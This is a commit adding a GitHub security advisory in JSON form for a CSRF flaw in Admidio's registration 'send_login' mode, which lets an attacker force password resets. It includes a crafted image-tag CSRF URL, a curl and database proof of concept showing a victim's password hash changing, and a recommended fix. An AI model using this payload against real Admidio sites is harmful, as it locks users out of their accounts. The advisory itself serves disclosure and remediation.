Skip to content

Commit 21b84a8

Browse files
1 parent 0367484 commit 21b84a8

1 file changed

Lines changed: 60 additions & 0 deletions

File tree

Lines changed: 60 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,60 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-mx25-j3rc-6w2w",
4+
"modified": "2026-05-29T21:58:44Z",
5+
"published": "2026-05-29T21:58:44Z",
6+
"aliases": [
7+
"CVE-2026-47228"
8+
],
9+
"summary": "Admidio's CSRF in registration `send_login` mode resets arbitrary user passwords",
10+
"details": "## Summary\n\n`modules/registration.php` mode `send_login` regenerates a random password for `user_uuid_assigned`, stores its bcrypt hash in `adm_users.usr_password`, and emails the cleartext to that user. Every other state-changing mode in the same file (`assign_member`, `assign_user`, `delete_user`, `create_user`) calls `SecurityUtils::validateCsrfToken($_POST['adm_csrf_token'])` first; the `send_login` branch does not. A page visited by a registration-administrator can issue the request as a top-level navigation, the browser sends the admin's `SameSite=Lax` cookies, and the server resets the chosen user's password without any further interaction from the admin.\n\n## Details\n\n### Vulnerable Code\n\n`modules/registration.php:124-138`:\n\n```php\n} elseif ($getMode === 'send_login') {\n // User already exists and has a login than sent access data with a new password\n $user = new User($gDb, $gProfileFields);\n $user->readDataByUuid($getUserUUIDAssigned);\n $user->sendNewPassword();\n\n // delete the registration because it isn't necessary anymore\n $registrationUser->notSendEmail();\n $registrationUser->delete();\n admRedirect(ADMIDIO_URL.FOLDER_MODULES.'/registration.php');\n // => EXIT\n}\n```\n\nThe four sibling branches all begin with `SecurityUtils::validateCsrfToken($_POST['adm_csrf_token']);` — for example `delete_user` at lines 110-118:\n\n```php\n} elseif ($getMode === 'delete_user') {\n // check the CSRF token of the form against the session token\n SecurityUtils::validateCsrfToken($_POST['adm_csrf_token']);\n\n // delete registration\n $registrationUser->delete();\n echo json_encode(array('status' => 'success'));\n exit();\n}\n```\n\n`User::sendNewPassword()` (`src/User/Entity/User.php`) calls `setPassword(PasswordUtils::generatePassword())` and persists the new hash before the email is queued; the password change happens unconditionally regardless of whether the e-mail send succeeds. This means even when the operator's SMTP is unconfigured, the victim's password is still reset.\n\nThe handler accepts `GET` (no enforcement of HTTP method, no `$_POST` requirement), so an `<img src=...>` or auto-submitting form is sufficient.\n\n### Exploitation Flow\n\n1. Attacker prepares a \"pending registration\" row anywhere they can — either by registering a self-controlled user account (the public registration flow creates these), or by waiting for an existing pending registration to be reachable.\n2. Attacker hosts a page that issues:\n `<img src=\"https://victim.example/admidio/modules/registration.php?mode=send_login&user_uuid={pending_registration_uuid}&user_uuid_assigned={victim_user_uuid}\">`\n3. A registration-administrator (someone with `isAdministratorRegistration()` — usually the org admin) visits the page while logged in to Admidio. The browser sends their session cookie (Admidio's session cookie does not set `SameSite=Strict`).\n4. Admidio's handler runs as that admin. It loads the assigned user, calls `User::sendNewPassword()` which writes a fresh bcrypt hash to `adm_users.usr_password`, and queues the cleartext password to be e-mailed to the user.\n5. The victim user's old password no longer works.\n\nThe cleartext lands in the *victim's* mailbox, not the attacker's, so the attacker does not get the password directly. The primary impact is therefore forced password reset (account lock-out / DoS for the victim) plus an information-disclosure side effect: the victim now has a password they did not request, and may be socially-engineered into believing the e-mail.\n\n## PoC\n\nTested locally against HEAD `c5cde53`. The reproducer confirms the password column changes server-side without any user interaction beyond an admin's `GET` to the crafted URL.\n\n```\n# 0. observe current admin password hash (the testadmin from install)\nmariadb -h 127.0.0.1 -P 3399 -u admidio -p... admidio \\\n -e \"SELECT usr_id, usr_login_name, LEFT(usr_password, 12) AS pwd FROM adm_users WHERE usr_id IN (2, 7);\"\nusr_id usr_login_name pwd\n2 testadmin $2y$12$AB.h\n7 victim $2y$12$L9q3\n\n# 1. attacker creates a pending registration with user_uuid pointing at \"victim\"\nmariadb ... admidio -e \"INSERT INTO adm_registrations (reg_org_id, reg_usr_id, reg_timestamp)\n VALUES (1, 7, NOW());\"\n# (the pending row gives the request a valid user_uuid for $registrationUser->delete())\n\n# 2. crafted CSRF endpoint, hit from a third-party page in the admin's browser:\n# no adm_csrf_token, GET only\ncurl -b $admin_cookie \\\n \"http://127.0.0.1:8085/modules/registration.php?mode=send_login&user_uuid=$pending_uuid&user_uuid_assigned=<victim_uuid>\"\n\n# 3. observe the victim's password hash has changed\nmariadb ... admidio \\\n -e \"SELECT usr_id, usr_login_name, LEFT(usr_password, 12) AS pwd FROM adm_users WHERE usr_id=7;\"\nusr_id usr_login_name pwd\n7 victim $2y$12$w5lQ\n```\n\nThe hash before the attack was `$2y$12$L9q3...`; after the attack it is `$2y$12$w5lQ...`. The victim's previously-known password no longer authenticates them.\n\nThe same call against `user_uuid_assigned=<admin's uuid>` resets the admin's own password — locking out the registration-administrator from their own account.\n\n## Impact\n\nA registration-administrator who visits a hostile page is silently coerced into resetting any user's password.\n\n* **Account lockout / DoS.** The victim user (which can be the admin themselves, or any other user with a registration row routed through this admin) loses access; their stored password is replaced with a server-generated one that only lands in the victim's mailbox.\n* **Phish-flavoured social engineering.** The unsolicited \"your new Admidio password is …\" e-mail is a credible-looking message that the attacker can pair with a phishing site to harvest the new password.\n* **Self-targetable.** Because the attacker also controls the public self-registration flow, they can reliably create a `pending_registration` row whose `user_uuid_assigned` points at any chosen victim.\n\n`UI:R` reflects that an admin must visit a page; `PR:N` because the *attacker* needs no Admidio credentials; `I:H` because user authentication state is destroyed; `A:L` because the affected user is locked out of an account but the platform stays up.\n\n## Recommended Fix\n\nAdd a CSRF check at the top of the branch and require POST:\n\n```php\n} elseif ($getMode === 'send_login') {\n // check the CSRF token of the form against the session token\n SecurityUtils::validateCsrfToken($_POST['adm_csrf_token']);\n\n if ($_SERVER['REQUEST_METHOD'] !== 'POST') {\n throw new Exception('SYS_INVALID_PAGE_VIEW');\n }\n\n $user = new User($gDb, $gProfileFields);\n $user->readDataByUuid($getUserUUIDAssigned);\n $user->sendNewPassword();\n ...\n}\n```\n\nA regression test should issue `GET /modules/registration.php?mode=send_login&...` from a session that has no current page (no in-session form key) and assert that `usr_password` is unchanged.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:H/A:L"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Packagist",
21+
"name": "admidio/admidio"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "5.0.10"
32+
}
33+
]
34+
}
35+
],
36+
"database_specific": {
37+
"last_known_affected_version_range": "<= 5.0.9"
38+
}
39+
}
40+
],
41+
"references": [
42+
{
43+
"type": "WEB",
44+
"url": "https://github.com/Admidio/admidio/security/advisories/GHSA-mx25-j3rc-6w2w"
45+
},
46+
{
47+
"type": "PACKAGE",
48+
"url": "https://github.com/Admidio/admidio"
49+
}
50+
],
51+
"database_specific": {
52+
"cwe_ids": [
53+
"CWE-352"
54+
],
55+
"severity": "MODERATE",
56+
"github_reviewed": true,
57+
"github_reviewed_at": "2026-05-29T21:58:44Z",
58+
"nvd_published_at": null
59+
}
60+
}

0 commit comments

Comments
 (0)